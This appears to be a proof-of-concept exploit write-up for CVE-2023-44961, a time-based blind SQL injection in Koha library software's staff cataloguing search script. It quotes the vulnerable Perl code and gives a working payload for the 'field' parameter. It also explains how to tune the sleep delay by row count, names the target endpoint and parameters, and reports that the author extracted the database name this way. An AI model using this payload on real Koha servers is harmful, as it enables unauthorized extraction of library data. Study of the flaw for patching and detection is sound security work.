## https://sploitus.com/exploit?id=8A764324-16A8-5489-8F73-B3D80CA30E81
# CVE-2023-44961
PoC for CVE-2023-44961

# Description
This is a SQL injection vulnerability in Koha Library Software v.23.0.5.04 and earlier which allows a remote attacker to obtain arbitrary data from the Koha SQL server.

# Analysis

The vulnerability is in `intranet/cgi-bin/cataloguing/ysearch.pl`, part of the staff (`intranet`) interface:

```perl
...
my $query = $input->param('term');
my $table = $input->param('table');
my $field = $input->param('field');   # never validated or escaped

# Prevent from disclosing data
die() unless ($table eq "biblioitems");   # only $table is checked

...

my $dbh = C4::Context->dbh;
# $field is interpolated into the statement text five times; only $query goes
# through bind parameters, so the '?' placeholders do not protect $field.
my $sql = qq(SELECT distinct $field
             FROM $table 
             WHERE $field LIKE ? OR $field LIKE ? or $field LIKE ?);
$sql .= qq( ORDER BY $field);
my $sth = $dbh->prepare($sql);
$sth->execute("$query%", "% $query%", "%-$query%");
...
```

`$field` and `$table` are interpolated straight into the statement string. Only `$table` is checked, and only against the single value `biblioitems`; `$field` is never validated against the table's column names or escaped, so whatever is sent in the `field` parameter reaches MySQL as SQL. This gives a time-based blind SQL injection, for example with the following value for the `field` parameter:

```
$field = 1 and if((substr(database(),1,1)='k'), sleep(1), sleep(0))
```

After interpolation the statement is the following (the three `?` remain bind placeholders and are filled at `execute` time with `"$query%"`, `"% $query%"` and `"%-$query%"`; with an empty `term` those are `%`, `% %` and `%-%`):

```sql
SELECT distinct 1 and IF((SUBSTR(database(),1,1)='k'),sleep(1),sleep(0))
FROM biblioitems
WHERE 1 and IF((SUBSTR(database(),1,1)='k'),sleep(1),sleep(0)) LIKE ?
   OR 1 and IF((SUBSTR(database(),1,1)='k'),sleep(1),sleep(0)) LIKE ?
   or 1 and IF((SUBSTR(database(),1,1)='k'),sleep(1),sleep(0)) LIKE ?
ORDER BY 1 and IF((SUBSTR(database(),1,1)='k'),sleep(1),sleep(0))
```

The injected expression appears once in the select list, three times in the `WHERE` clause and once more in `ORDER BY`, and `SELECT distinct $field FROM $table WHERE $field LIKE ? OR $field LIKE ? or $field LIKE ?` evaluates its `WHERE` condition for every row of `$table`. The total delay is therefore a multiple of (number of rows) × (the `sleep()` argument), not a single sleep.

To keep the total delay manageable on a large table, scale the sleep down by the row count: with n rows in `$table`, use `sleep(1/n)`, so that a true condition still adds at least about one second in total while a false one returns immediately.

## PoC

To trigger the injection, the `biblioitems` table must contain at least one row (with an empty table the per-row expression never runs and nothing sleeps). Records can be added through the following URL:

```
http://koha_ip:intranet_port/cgi-bin/koha/cataloguing/addbiblio.pl
```

I have added a piece of data here:

![](./png/add_biblio.png)

Testing the injected SQL statement directly in the MySQL client:

![](./png/test_sqlcommand.png)

With a single row in `biblioitems` and `sleep(1)` in the payload, the query takes about 3 seconds rather than 1: the injected expression is evaluated more than once per row, as described in the analysis above.

Following this approach, a PoC can be constructed for testing. Send a request to the following URL with `table=biblioitems` (anything else hits the `die()`), `field` set to the payload above and any value for `term`, and compare the response time against the expected sleep:

```
http://koha_ip:intranet_port/cgi-bin/koha/cataloguing/ysearch.pl
```

![](./png/poc.png)

As shown in the figure, my database name is `koha_mykoha`.